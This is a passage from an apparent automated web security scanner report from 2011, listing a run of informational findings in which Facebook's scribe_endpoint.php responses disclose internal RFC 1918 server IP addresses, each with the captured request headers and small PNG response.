Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df110d92d54%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3a6b1c944%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43418837&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.182.37
X-Cnection: close
Date: Thu, 16 Jun 2011 11:25:12 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.569. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.138.58

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A566%2C%22baseline_elapsed%22%3A566%7D&asyncSignal=4563 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df27c25c64%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff118208ba%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.138.58
X-Cnection: close
Date: Thu, 16 Jun 2011 14:34:45 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.570. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.26.51

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1510%2C%22baseline_elapsed%22%3A1510%7D&asyncSignal=6245 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df16aca2c6c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3306de7a4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.26.51
X-Cnection: close
Date: Thu, 16 Jun 2011 15:05:46 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.571. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.75.45

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1290%2C%22baseline_elapsed%22%3A1289%7D&asyncSignal=2816 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df316483ae%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2b1d388a%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.75.45
X-Cnection: close
Date: Thu, 16 Jun 2011 15:16:04 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.572. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.136.50

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1057%2C%22baseline_elapsed%22%3A1057%7D&asyncSignal=6290 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1e6496c58%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffac3ba548%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.136.50
X-Cnection: close
Date: Thu, 16 Jun 2011 17:09:50 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.573. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.104.48

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1752%2C%22baseline_elapsed%22%3A1739%7D&asyncSignal=9528 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.104.48
X-Cnection: close
Date: Thu, 16 Jun 2011 18:27:26 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.574. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.143.122

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1301%2C%22baseline_elapsed%22%3A1252%7D&asyncSignal=6150 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df365585b5%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff30c81b7ac%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.136.143.122
X-Cnection: close
Date: Thu, 16 Jun 2011 17:51:10 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.575. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.30.56

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A670%2C%22baseline_elapsed%22%3A671%7D&asyncSignal=6713 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd8d377b%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff96bb174%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.30.56
X-Cnection: close
Date: Thu, 16 Jun 2011 14:50:15 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.576. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.183.190

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1208%2C%22baseline_elapsed%22%3A1192%7D&asyncSignal=4870 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df32f2e7a9c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2b994818%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.32.183.190
X-Cnection: close
Date: Thu, 16 Jun 2011 16:49:07 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.577. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.228.65

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1664%2C%22baseline_elapsed%22%3A1656%7D&asyncSignal=7869 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfb4cb576c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff25c0fb1fc%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.228.65
X-Cnection: close
Date: Thu, 16 Jun 2011 16:38:46 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.578. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.20.44

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1492%2C%22baseline_elapsed%22%3A1585%7D&asyncSignal=8757 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.20.44
X-Cnection: close
Date: Thu, 16 Jun 2011 14:50:11 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.579. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.8.31

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A189%2C%22baseline_elapsed%22%3A234%7D&asyncSignal=7487 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2431cd37c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff10f93420%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.55.8.31
X-Cnection: close
Date: Thu, 16 Jun 2011 12:51:24 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.580. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.177.37

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1561%2C%22baseline_elapsed%22%3A1536%7D&asyncSignal=328 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.62.177.37
X-Cnection: close
Date: Thu, 16 Jun 2011 19:03:47 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.581. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.176.36

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1407%2C%22baseline_elapsed%22%3A1407%7D&asyncSignal=8682 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3668299ec%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffe69f3b88%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.176.36
X-Cnection: close
Date: Thu, 16 Jun 2011 18:01:34 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.582. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.182.122

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A6498%2C%22baseline_elapsed%22%3A6498%7D&asyncSignal=2501 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.32.182.122
X-Cnection: close
Date: Thu, 16 Jun 2011 13:12:08 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.583. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.238.61

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1190%2C%22baseline_elapsed%22%3A1195%7D&asyncSignal=2183 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df39c0348ec%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff28a44e6b4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
